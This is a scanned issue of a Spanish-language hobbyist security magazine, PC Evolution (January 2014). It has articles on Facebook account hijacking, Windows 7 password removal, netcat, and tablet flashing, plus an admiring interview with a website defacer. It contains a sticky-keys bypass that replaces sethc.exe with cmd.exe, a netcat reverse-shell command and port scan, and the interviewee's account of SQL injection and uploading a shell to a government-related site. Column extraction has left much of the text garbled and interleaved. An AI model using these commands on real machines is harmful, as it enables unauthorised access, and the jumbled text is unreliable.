You are on page 1of 16

Edición 2

Precio: $ 3.00 Enero 2014

Cd de
Entrenamiento
BOOTEA
PRACTICAS
COMPRENDES

1
2
2
LA REDACCIÓN
A NUESTROS LECTORES EDICIÓN
Pc Evolution es una Revista que trata temas de Seguridad Informática y
No.
todo lo relacionado en el campo tecnológico, cada tema está escrito y
analizado en profundidad por profesionales en el área de diversos países,
nuestra Revista es práctica con lo cual se convierte en un instrumento valioso
de aprendizaje que todo técnico y aficionado puede apreciar y replicar
los mismos en el Cd que se adjunta, de seguro Pc Evolution ya es una de las
Revistas con temas de impacto a nivel nacional. Gracias por la acogida de
nuestro primer número! Ahora disfruten de nuestro contenido.

4 FACEBOOK que nadie hackee tu cuenta

6 WINDOWS7 recupera tus claves de acceso

8 NETCAT la navaja Suiza de los hackers

10 FORMATEA tablets Chinas

ENTREVISTA
12 d4n1ux/ La verdadera historia de un hackeo

3
Facebook que nadie hackee tu cuenta

FACEBOOK
En este artículo Aprenderás...
Identificar los diversos métodos que utilizan
los intrusos para obtener las contraseñas
de sesión de una de las redes sociales más

Hackee
populares y su defensa respectiva.
Que nadie
tu
CUENTA Requisitos…
Manejo de Sistemas Windows y
Linux

La popularidad de las Redes Sociales y el


continuo incremento de usuarios en cada
una de ellas permiten ser blanco perfecto

1
para los intrusos y por consiguiente las con-
traseñas se vuelven el aperitivo especial
para espiar la información, desde contrase-
ñas llenas de símbolos y signos, hasta frases
largas con tediosos significados se han con-
vertido como la primera alternativa para Plugin instalado en
el navegador.
formar una barrera que impide el acceso al
control total de nuestras cuentas, pero es
posible que nuestra seguridad sea que-
brantada por diversos métodos de ataque?

Empecemos:

2
Los procesos que corren en cada sistema
operativo nos muestran el trabajo que están
cumpliendo las rutinas respectivas, un intruso
es capáz de falsear un proceso y colocarlo en
modo escucha, capturando todo lo que re-
Realizando capturas
gistra un usuario especialmente su password en la red.
que se creía seguro a primera vista, tanto en
sistemas Windows – Linux un usuario con
conocimientos avanzados podría dejar una
puerta trasera (backdoor) e ingresar silen-
ciosamente en tu ordenador capturando todo
lo que este al paso sin que te des cuenta de lo
que sucede, todo de forma invisible.

Análisis 1

Plugin Malicioso en Firefox

Firesheep, este Plugin es considero como un


complemento efectivo en la captura de las
3Plugin secuestrando
sesiones de diversas redes sociales como Fa- la sesión.
cebook, twiter, etc. Pero lo más interesante es
que en este navegador solo bastará con dar
un par de clic y se capturará todo lo que cir-
cula en sesiones sin encriptación.
El problema radica en que cada vez que acce-
demos con nuestro nombre de usuario y pass- Figura 1._ Plugin instalado en el navegador Firefox, el mismo proceso en sistemas Windows y Linux
word el servidor valida los datos y verifica si es
correcto para luego loguearnos en el sistema, En la figura 1 puedes observar el plugin total- indetectables a cualquier software de protección
el mismo nos devuelve un fragmento de có- mente operativo funcionando y obteniendo del ordenador y estos sirven como puente para
digo llamado cookie cuya función es acelerar el acceso a diversos controles de una de las que la capturas se presenten en forma directa e
el ingreso de forma automática en un próximo redes más populares del momento. invisible, donde solo el atacante mediante la uti-
inicio de sesión, pero la mayoría de los sitios lización de una palabra secreta obtiene acceso
web no cifran los fragmentos enviados por tal Análisis 2 total a toda la escritura prevista desde que se
motivo estas quedan vulnerables a los ataques instaló el mecanismo.
denominados HTTP session hijacking y en una El hardware también está involucrado dentro Estos dispositivos tienen costos accesibles y
red inalámbrica el peligro es mucho mayor. de la seguridad y se han creado clones usb y son difundidos en la red ampliamente. Anali-
ps/2 como dispositivos de espionaje que son zar la figura 2.

4
PC Evolution Edición 2
Facebook que nadie hackee tu cuenta

Figura 2._ Conexión del dispositivo capturador usb, ps/2

Análisis 3

Linux no es la excepción, para este tipo de


ataques, ya que existen herramientas sofisti-
cadas que permiten falsear el sitio web de Process Hacker
las redes sociales populares y mediante la
Muestra Procesos en forma gráfica
redirección hacia la dirección falsa, un intruso
lograría adueñarse de los datos del usuario.
La mayor parte de este software es configu-
rable y las capturas pueden ser enviadas me-
diante protocolos de transferencias ftp o smtp Administrator: Command Prompt

Microsoft Windows [Version 6.0.6000]


sin dejar rastro alguno. Copyright (c) 2006 Microsoft Corporation. All rights reserved.

Active Connections
Defensa
TCP 10.0000000:49465 204.2.228.67:http CLOSET WAIT
Cientos de sitios fraudulentos dicen ser exper- Sistema “d.o.s” netstat
TCP
TCP
10.0000000:49514
10.0000000:49600
204:remote-winsock
204:remote-winsock
ESTABLISHED
ESTABLISHED
TCP 10.0000000:49603 204:11256 ESTABLISHED
tos hackeando contraseñas, mucha gente cae TCP
TCP
10.0000000:49842
10.0000000:49844
204:remote-winsock
204:ms-wbt-server
ESTABLISHED
ESTABLISHED

en ese tipo de fraude y pierden su dinero du- 204:remote-winsock ESTABLISHED


Revisión de conexiones y puertos de
TCP 10.0000000:49946
TCP 10.0000000:51717 204.2.228.67:http CLOSET WAIT
TCP 10.0000000:52863 204:8080 ESTABLISHED

ramente ganado, recomendamos realizar un tu pc TCP


TCP
10.0000000:52864
10.0000000:52877
204:8080
204:epmap
ESTABLISHED
ESTABLISHED
TCP 10.0000000:52878 204:1027 ESTABLISHED
análisis de los procesos que se están ejecutan- TCP
TCP
TCP
10.0000000:52884
10.0000000:52885
10.0000000:52887
204:8080
204:8080
204:808000:63331
ESTABLISHED
ESTABLISHED
SYN_SENT
do en tiempo real mediante la herramienta Administrador: Símbolo del sistema X

“Process Hacker” y “KillProcess”, además te C: \Windows\system32>TASKLIST


permiten terminar un proceso sospechoso, ============================ ========= ================= ============ ==============
ejecuta el comando tasklist en sistema d.o.s System Idle Process
System
0
4
Services
Services
0
0
28 KB
596KB

te permitirá mostrar todas las aplicaciones smss.exe


csrss.exe
300
432
Services
Services
0
0
680 KB
3,228KB
wininit.exe 512 Services 0 2,744KB
con su respectivo “Pid” (número de identidad csrss.exe
winlogon.exe
520
588
Console
Console
1
1
7,420KB
6,444KB

del proceso). services.exe


lsass.exe
612
628
Services
Services
0
0
5,240KB
5,024KB Tasklist
svchost.exe 736 Services 0 5,204KB
Podemos combinarlo junto al comando task- nvvsvc.exe
nvSCPAPISvr.exe
772
796
Services
Services
0
0
4,688KB
3,288KB Aplicaciones con su Pid respectivo
kill para detener los procesos usando su Pid svchost.exe
atiesrxx.exe
828
892
Services
Services
0
0
5,436KB
2,208KB

respectivo. dwm.exe
svchost.exe
940
960
Console
Services
1
0
32,376KB
12,000KB

Mostrar Procesos y guardarlos en un archivo

C:\Users\>tasklist > reporte.txt * Utiliza el comando netstat y analiza la co- * El proceso de escritura debe ser rápida re-
C:\Users\>start notepad reporte.txt lumna “state” y saber las ip remotas conecta- cuerda que un intruso es capáz de memorizar
das. tus pulsaciones.
Terminar Procesos con su Pid respectivo Evita escribir tus contraseñas en lugares Practica con el software incluido en nuestro
donde existan cámaras de vigilancia. Cd.
C:\Users\>taskkill /pid 200 /f
PASSWORD SEGURO
* Ingresar a la ruta C:\Program Files y veri-
ficar carpetas con nombres sospechosos
En la Red:
donde se almacena el contenido capturado,
examina el registro de Windows en las claves: http://aprenderinternet.about.com/od/SegFacebook/
HKEY_CURENT_USER\Software\Microsoft\ Consejos de Seguridad en Facebook
http://www.ipburger.com/blog/how-to-find-someone%E2%80%99s-ip-address-if-you-are-using-windows-7/
Win-dows\CurrentVersion\Run y HKEY_LOCAL_ Ejemplos de comando desde d.o.s
MACHINE\SOFTWARE\Microsoft\Windows\ http://www.osi.es/es/protegete/protegete-en-internet/redes-sociales/guia-seguridad-facebook
CurrentVersion\Run Alternativas de seguridad, consejos técnicos

5
PC Evolution Edición 2
Windows 7 Recupera tus claves de Acceso

WINDOWS 7
En este artículo Aprenderás...
Recuperar las claves de acceso olvida-
das en tu sistema windows7, asi como

Acceso
el manejo de herramientas útiles de
Recupera tus recuperación.
claves de Requisitos…
Manejo de Sistemas Windows y D.O.S

El Control de cuentas de usuario (UAC) es una X


característica de Windows, este ayuda al con-
trol de un ordenador el cuál le informa si un
software ha realizado algún cambio específico
que requiera privilegios de administrador.
Estas contraseñas son el bloque defensivo para
mantener al sistema intacto y que cualquier Figura 1._Imagen de Configuración
anomalía que se realice como una alteración del Setup de nuestro Ordenador con
Arranque de Cd
indebida pueda ser alertada y restringida de
inmediato, pero en muchas ocasiones las
combinaciones fuertes de nuestras claves de
acceso y el continuo cambio producto de las
técnicas de seguridad informática y evasión
de intrusos producen quebrantamientos en
el recordatorio de las mismas, Es posible re-
cuperar nuestras contraseñas en un sistema Figura 2._ Ingresamos al modo por
informático? Rotundamente Sí. Hoy explicare- defecto de Trinity Rescue Kit
mos en detalle los pasos necesarios para realizar
dicho mecanismo en el sistema Operativo Win-
dows versión 7.

Empecemos

Trinity Rescue Kit es una distribución linux


que permite realizar operaciones de recu-
peración y reparación de equipos en diversas
plataformas, además del restablecimiento de
contraseñas e incluso la detección de virus.
Figura 3._ Escribimos el nombre del
Modificando el Arranque de la Bios usuario que se quitará el password

Para ejecutar la distribución linux debemos


colocar la unidad de nuestro cd o dvd como
primer sistema de booteo, esto lo realizamos
ingresando al Setup de nuestro ordenador.

En detalle:
1._ Elegimos: Run Trinity Rescue Kit 3.4 (de-
fault mode, width test menu)
Figura 4._ Escribimos el número de
2._ Windows password resetting la partición del sistema instalado
3._ Winpass with prompt for username first

Hasta aquí hemos logrado acceder al menú


principal e interactuado con el live cd, ahora
es momento de escribir el nombre de usuario
en este ejemplo será Nisfe.
Una vez escrito el nombre de usuario, debes
de seleccionar la instalación del sistema win-
Figura 5._ Elegimos la opción 1 para
dows7, en este caso sólo escribimos el nume- borrar el password por completo
ro 1, que es la partición donde está alojado
el sistema, si en tu ordenador existen más
sistemas el número se ampliará y la elección
dependerá de la partición.

6
PC Evolution Edición 2
Windows 7 Recupera tus claves de Acceso

Por último es necesario elegir la opción: Clear


(blank) user password, para ello escribimos el
número “1” y presionamos la tecla Enter

Alterando el Password del usuario


Administrador
En la Red:
Si modificas la opción del paso 2 y eliges: Reset http://j3f3rx.wordpress.com/2010/05/15/cambiar-la-contrasena-en-windows-7/
password on built-in Administrator (default ac- Ejemplos prácticos de acceso
tion) automáticamente podrás elegir la alter- http://hardsoftgeek.com.ar/
Información sobre Windows7
nativa para quitar el password administrativo,
http://www.luiskano.net/blog/2011/08/22/como-cambiar-o-eliminar-una-contrasena-en-windows-7/
además de varias opciones que ofrece esta mag- Ayuda adicional sobre el tema tratado
nífica distribución de software libre.

OTROS MÉTODOS DE ACCESO

1._ Arranca el Disco de Instalación y Elige la Opción: REPARAR EQUIPO 2._ Selecciona la opción de símbolo del sistema (command prompt)

4._ Copia el archivo cmd.exe a sethc.exe y Reemplázalo


3._ Realiza una copia de seguridad del archivo original, escribe lo siguiente: copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
X

5._ Reinicia el Computador

6._ Cuando te aparezca esta pantalla presiona 5 veces la tecla SHIFT 7._ Ahora solo debes de escribir lo siguiente:
net user geek MyNewPassword

En Nuestro Cd encontrarás el Software para tus prácticas

7
PC Evolution Edición 2
NETCAT la navaja suiza de los hackers

NETCAT
En este artículo Aprenderás...

Manejo de varias opciones de netcat,


además, de las técnicas que hackers de

Hackers
todo el mundo hoy en día la utilizan.
La navaja
Suiza de los Requisitos…
Manejo de línea de comando en Linux

Abrir puerto Tcp y ejecutar un Chat

Muchos de los usuarios se habrán pre- Equipos para


guntado Qué herramientas utilizan los Prácticas
hackers en una intrusión? Pués Hoy root@bt: # nc -lvp 4444
comentaremos uno de ellos. Netcat lintening on [any] 4444...
es un poderoso programa que fue 1._ Pc1 con Distro Pc Local 192.168.1.101: inverse host lookup failed: Unknown s
desarrollado especialmente para Backtrack cuya ip erver error : Connection timed out
los administradores de redes e incluso será: connect to [192.168.1.102] from (UNKNOWN) [192.168.1]
hackers de todo el mundo lo utilizan, por 192.168.1.102
el cuál hoy en día es denominado “La Pc Local bt: # nc -v 192.168.1.102 4444
navaja Suiza de los Hackers”, fue creado 192.168.1.102 : inverse host lookup failed: Host name lookup failur
Pc Remote (UNKNOWN) [192.168.1.102] 4444 (krb524) open
en 1996 y luego migrada a entornos Win-
Gracias por leer nuestra revista Pc-Evolution
dows y otras plataformas que le dan a
estos sistemas cierto poder sobre el pro-
tocolo Tcp/ip, esta super herramienta
trabaja mediante línea de comando y
su sintaxis es tan sencilla que pueden
Reverse shell
abrir puertos en un determinado Host
además de varias alternativas que
pueden ser explotadas incluso en una
intrusión o hackeo de servidores. Netcat
nos da la posibilidad de ser instalado in- root@bt: # nc -lvp 4444
cluso junto a un backdoor alterando el 2._ Pc2 con Distro lintening on [any] 4444...
registro del sistema, pero en estas prác- Fedora cuya ip Pc Local 192.168.1.101: inverse host lookup failed:
ticas utilizaremos Linux como servidores será:
principales y secundarios 192.168.1.101
Pc Remote

bt: # nc -v 192.168.1.102 4444 -e bin/bash


(UNKNOWN) [192.168.1.102] 4444 (?) open
Empecemos: Pc Remote HOLA SOY 192.168.1.102

Esquema de la Red
Estructura de la red Vamos a realizar
un esquema de nuestra red que he-
mos implementado para exponer
ejemplos claros que te permitirán
conocer todo el potencial de esta fabu-
losa herramienta, los equipos fueron
conectados con clable par trenzado. Ip:192.168.1.102 Ip:192.168.1.101
El firewall se omitió en estas prác- Sistema: Linux Sistema: Linux
ticas, los sistemas utilizados son
totalmente libres y cada proceso e
instrucción fue supervisado por un
administrador experto en el tema.

8
PC Evolution Edición 2
NETCAT la navaja suiza de los hackers

OPCIONES DE NETCAT EN LINUX


-c shell comandos similar a parametro `-e’
Esquema de la Red -e fichero programa para ejecutar despues de establecer la conexión
-k set keepalive option on socket
-l modo “listen”, para conexiones entrantes
-n solo direcciones ip, sin resolución de nombres
-o file volcado hexadecimal del tráfico
Ip:192.168.1.102 Ip:192.168.1.101 -p port puerto local a utilizar
Sistema: Linux Sistema: Linux -r puerto local aleatorio
-q secs pausar y salir despues de unos segundos tras recibir una señal de EOF
NETCAT se puede -s addr direccion local de origen
implementar como backdoor como -T tos configura el “Type Of Service”
un ataque interactivo -t responder a la negociación TELNET

Scanner de Puertos Netcat puede utilizarse en innumerable


entornos, dependerá de la creatividad de
cada administrador probar cada sintaxis
que incluye dentro su propio readme,
root@bt: # nc vz 192.168.1.101 3305-3306
los hackers han permitido conocer diver-
192.168.1.101: inverse host lookup failed: Unknown s sas técnicas tanto de verificación, pen-
Pc Local Now server error : Connection timed out etración en entornos locales, remotos y
(UNKNOWN) [192.168.1.101] 3306 (mysql) open su análisis respectivo, en la actualidad
diversas distribuciones traen por defecto
instalada esta aplicación.

3306 (mysql) open


Pc Remote

Conexión con Tiempo limitado de 20 segundos

En la Red:
root@bt:
nc -l 2389 http://crysol.org/es/netcat
Pc Local Ejercicios complejos

http://www.ecured.cu/index.php/Netcat
root@bt: Datos relacionados con su historia
nc -w 20 localhost 2389
Pc Remote http://systemadmin.es/2009/04/uso-de-netcat-herramientas-unix-iii
Información detallada del comando en linux

9
FORMATEA Tablet Chinas

FORMATEA
En este artículo Aprenderás...

Flashear tablet genéricas, mediante


software y diversas combinaciones de
botones que traen por defecto estos

Tablets Chinas
dispositivos.

Lo que deberías saber:


Manejo básico del Computador

La Popularidad de Android crece a pasos


acelerados debido a que es un sistema abier-
to y funciona en diversos smartphones, tablets

1
de diversas modelos y marcas, la mayoría
de los fabricantes permiten que nuestros
dispositivos puedan ser actualizados a me-
dida que van apareciendo nuevas actual-
izaciones del sistema, esto permite que la
marca pueda generar fidelidad y lo mejor de
todo es que lo podemos encontrar en sus
portales de forma gratuita lista para descar-
ga e instalable en cada dispositivo.

Las Roms

2
Las Roms que vienen instalados en cada dis-
positivo se las denomina Rom Stock, mientras
que el sistema personalizado recibe el nombre
de Rom o Rom Custom, por tal motivo cuan-
do necesitemos actualizar nuestro sistema
necesitamos la Rom Stock que es la que viene
instalada de fábrica.

3
Escenario
Tablet China
Drivers y Rom “puede ser Room Stock o Cus-
tom”

Empezamos:
Lo primero que debemos realizar es descom-
primir la carpeta con el software llamado
LiveSuit Pack v1.09 este permitirá realizar le
formateo limpio en el dispositivo sea con pan-

4
talla de 7” o 10” (pulgadas), luego aparecerá
dentro de la carpeta el archivo LiveSuitPack_
version_1.09_20120301.exe que debemos de
ejecutarlo, en el mismo debemos de elegir el
idioma que se ejecutará la aplicación, ahora
conectamos la tabla mediante cable usb e

5
instalar el drivers asi será reconocido por el
sistema operativo, con el cual sólo tendremos
que ejecutar de la misma carpeta el archivo
LiveSuit.exe, el programa lanzará una adver-
tencia y que debemos de elegir la opción No,
para omitir el proceso de backups.

DISEÑOS DE TABLETS
que se pueden adquirir a bajo costo

10
PC Evolution Edición 2
FORMATEA Tablet Chinas

Con esto será suficiente para mostrar el pro-


grama LiveSuit con varias alternativas de las

6
cuales elegimos Select Image para cargar
nuestra Room Stock esto hará que se cargue
en nuestra tablet, por tal motivo debemos
asegurarnos que la Room pertenezca a nu-
estro modelo especifico y asi evitar caídas o
cuelgues del sistema.

El nombre de la Room debe aparecer en el


campo Image, la mayor parte de las imá-
genes que son descargadas y que sirven como
sistema de operación en las diversas Tablets
tienen el formato .img
Tengan mucho cuidado con las Rooms que

7
no pertenecen al mismo modelo de Tablets
ya que en nuestras prácticas tuvimos que
flashear muchas veces debido a la incom-
patibilidad de las mismas, más aun cuando
son Tablet genéricas y donde el fabricante no
proporciona información del hardware.

Ahora debemos de poner la Tablet en modo


Usb, lo hacemos de la siguiente manera:
1._ Presiona el botón de volumen (no lo suel-

8
tes)
2._ Conecta el cable usb dela Pc a la Tablet
3._ Presiona el botón de encendido entre
unas 15 o 20 veces.

Entonces el programa LiveSuit mostrará una


ventana con un mensaje y damos clic en la
opción Si, esto permitirá que hagamos un

9
formateo limpio asi el nuevo sistema Android
que se aloje en el equipo funcionará al 100%
y sus estabilidad dependerá del tipo de Room
que instales.

Una vez más el software nos permitirá elegir la


opción Si, para realizar el formateo de forma
automática, el tiempo de duración del mismo
dependerá del peso de la Room y del hard-

10
ware donde realices el proceso, en la imagen
adjunta se ve claramente el porcentaje que
muestra LiveSuit durante la instalación.

En la mayoría de las tablas donde no tenemos


información exacta de nuestro equipo el touch,
la cámara incluso el Wifi queda totalmente in-

11
operativo y la única solución que existe hasta
el momento es buscar los drivers correspon-
diente a cada uno de ellos, por tal motivo
debemos revisar el equipo una vez que ha sido
reinstalado su sistema. En equipos donde no
es posible hacer funcionar por completo el
Touch lo aconsejable seria colocar un Mouse
y Teclado aparte y manejarnos de esa manera
En la red:
hasta localizar su respectivo driver.
El proceso de flasheo concluye con el mensaje http://forum.gsmhosting.com/vbb/f781/china-tablet-allwneer-a13-1600417/
Upgrade succeeds, ahora solo faltaría presio- Foro con ayudas avanzadas
nar el botón Aceptar y cerrar el Software. http://www.emergiant.com/blog/2012/08/15/how-to-recover-a13-cortex-a8-tablets-from-firmware-failure/
Material de ayuda básico
http://vimeo.com/71859458
Con estos pasos podrás tener la tablet Video explicativo sobre estos modelos de tablets
Con un sistema actualizado, ahora solo
Tendrás que empezar a buscar aplicaciones.

11
PC Evolution Edición 2
Entrevista - d4n1ux / La verdadera historia de un hackeo

d4n1ux
d4n1ux “Joven Ecuatoriano, Experto en
Seguridad Informática, realizó varios De-
facements y sus registros están en la web

Hackeo
http://www.zone-h.org/ dialogó con nues-

La verdadera
tra revista sobre la verdadera historia del
hackeo a una web importante de nuestro
Historia de un país”.

Pc-Evolution._ Gracias d4n1ux por permitirnos esta entrevista, bien- Pc-Evolution._ Podrías detallarnos la hora exacta del hackeo y con que
venido y felicitaciones por permitir que parte de tus conocimientos otros miembros efectuaron la intrusión?.
nuestros lectores conozcan?.
d4n1ux._ Fue el día viernes 8 de febrero como a las 8 de la noche hici-
d4n1ux._ De nada espero ser un gran aporte por este gran proyecto. mos el ataque yo, nith0r y netr00t de mi team, primeramente accedí
remotamente al servidor por medio de la Shell eso fue por la tarde me
Pc-Evolution._ Como se formo el Grupo, cuantas personas forman cree una home.html para poder registrarla en Zone-H x que no está-
parte, de quien fue la idea de poder formar el Team?. bamos seguros de desfigurar la página principal que es el default.asp
pero por la noche decidimos atacar la pagina principal estuvimos como
d4n1ux._ LatinHackTeaM se formó hace unos 6 o 7 meses no lo recu- 5 horas viendo documentos archivos códigos, etc.
erdo muy bien pero la idea fue de rayokent un defacer venezolano, bueno
yo fui el de la idea del nombre entre los dos somos los fundadores, Pc-Evolution._ Algún mensaje especial que desear hacer conocer
la formamos 4 personas yo de ecuador, rayokent de Venezuela, miusi para nuestros lectores y para los administradores de servidores y que
y netr00t de Argentina, hasta hace poco un tal axuz también fue del sistema crees que se debería utilizar?.
team, el le hizo un deface a la web de la cámara de diputados de México
lo amenazaron y decidió abandonar el grupo, axuz es mexicano x cierto. d4n1ux._ Linux es muy seguro, te cuento que la mayoría de servidores
que alojan webs de gobiernos del mundo e incluso de aquí utilizan
Pc-Evolution._ Como encontraste la vulnerabilidad y que tiempo de- Windows IIS (internet information server) esos servidores son muy vul-
moraste en estudiar los agujeros de la web ecuatoriana?. nerables, es mejor utilizar algo más seguro como linux, decirles que no
me considero hacker solo soy un amante a la seguridad informática.
d4n1ux._ El bug lo encontré junto a nith0r un ex defacer chileno, a
la web accedimos desde hace tres meses antes del deface, un tal red
hack publicó la vulnerabilidad en un foro algo que no veo ético x q la
web aun era vulnerable y no era conveniente publicar el bug a eso se
aprovecharon unos usuarios e hicieron el segundo ataque donde pusi-
eron la frase “Con Colombia no se metan”, eso no lo hicieron ni hacker
ni defacer de Colombia fueron unos simples usuarios de la red, x cierto
cuando nith0r y yo hicimos el primer ataque a la web ellos especularon
diciendo que la web estaba en proceso de mantenimiento, nosotros
accedimos tres meses antes del ataque no creo que una web tan im-
portante este 3 meses en proceso de mantenimiento simplemente fue
irresponsabilidad de los administradores que ni siquiera corrigieron el
bug si no que eliminaron el modulo de administración.

Pc-Evolution._ Entonces el administrador de la web ecuatoriana no


corrigió el agujero, eso quiere decir que lastimosamente no existe el
interés necesario por la seguridad de los datos?.

d4n1ux._ Exacto, después del segundo ataque quise acceder a la ad-


ministración pero ellos ni siquiera se tomaron la molestia de mejorar la
seguridad simplemente eliminaron el archivo vulnerable.

Pc-Evolution._ La vulnerabilidad que encontraste que es? cuales son


las amenazas? que tan peligroso es?

d4n1ux._ Ataques a Inyección SQL, la vulnerabilidad comprometía al


servidor e incluso con nith0r subimos una Shell al hacerlo tuvimos ac-
ceso a todo el servidor incluso hice más defacements y está registrado
en la web de zone-h.

12
Noticias

HACKERS
famosos de todos los tiempos
Parte 1
También conocido como El Condor, fue
señalado por el FBI como el criminal in-
formático más buscado en la historia de
los Estados Unidos. Burló los sistemas de
seguridad de compañías como Motorola
y Nokia. Tras pasar cinco años en la cár-
cel, fundó una empresa de seguridad in-
formática.

Es reconocido por ser el creador del primer


gusano desencadenado en Internet. Según
Tapan, inventó el gusano para conocer qué
tan largo era internet, pero su invento se
replicó de una manera desmedida. En la
actualidad es un reconocido profesor de
ciencias de la información.

Saltó a la fama cuando en 1990 alteró el


sistema de llamadas de una emisora de
los Ángeles, para ganarse un Porsche. No
obstante, el golpe que le ocasionaría la
prisión fue un ataque a las bases de datos
del FBI, en 1991. En la actualidad, es un
prolífico escritor de temas de tecnología y
seguridad informática.

El cofundador de Apple, engrosó la lista


de hackers antes de su éxito profesional.
Se dice que en la Universidad de Califor-
nia, donde estudiaba, diseñó para sus
amigos cajas azules con las cuales podían
llamar de manera gratuita a cualquier des-
tino del mundo, gracias a la alteración que
Wozniak había hechos a varios sistemas
telefónicos.

13
PC Evolution Edición 2
Precios Económicos en todos nuestros Materiales
14 Frente Coliseo Cerrado de Naranjito y pista de patinaje
Av. Vía NARANJITO - San CARLOS
DESEOS &
FELICITACIONES para

Sr. Ismael Peña


Dir. Tec. del “Club de Amigos”
Sr.Comisión
Jonathan Peña
de Tránsito del Ecuador

Sigan adelante, éxitos para sus prómixos


FELICITACIONES a la revista Pc-Evolution
números la revista Pc-Evolution

Ing. Patricio Carvajal Lic.Licenciada


Stefania Peña
en Enfermería

Éxitos para todos los milagreños y Saludos y éxitos a todos los milagreños en
a la revista Pc-Evolution el 2014.

Lcda. Carmita Peña Molina Sr. Paolo Gonzales


Jugador Milagreño capitan “Club Amigos”
Licenciada en Educación

Deseos y bendiciones para todos los milagreños, Éxitos para la revista en el 2014.
sigan adelante señores de Pc-Evolution

Sr. Iván Díaz


Comisión de Tránsito del Ecuador
Dra. Nelly Alvarez Terán
Especialista en Odontología

Lo mejor para todo el equipo de la revista Endodoncia, Blanqueamiento Dental, Diseño de Sonrisa
Pc-Evolution, felices 2014. Fono: 042727980 BUCAY - ECUADOR

Sra. Verónica Peña Sr. Daniel Peña


Tec. diferentes Clubes ecuatorianos
Les deseamos lo mejor en el 2014
para quienes conforman la revista FELICIDADES para la revista
Pc-Evolution sigan adelante. Pc-Evolution.

Ab. Néstor Solórzano Dr. Klever Urgilés


Agente Fiscal del Cantón Milagro Especialista en Odontología

Bendiciones y Felicidades para todos los ciudadanos Extracciones, Odontología en niños y Adultos
del Cantón Milagro, Éxitos para la Revista Pc-Evolution Fono: 0982883497 MILAGRO - ECUADOR

Sra. Esmeralda Peña Sr. Manuel Domínguez


Mecánico Naval

Que la FELICIDAD reine en todos los hogares, Lo mejor para la Revista Milagreña, éxitos
Feliz 2014 éxitos a la revista. para todos en el 2014
15
16

You might also like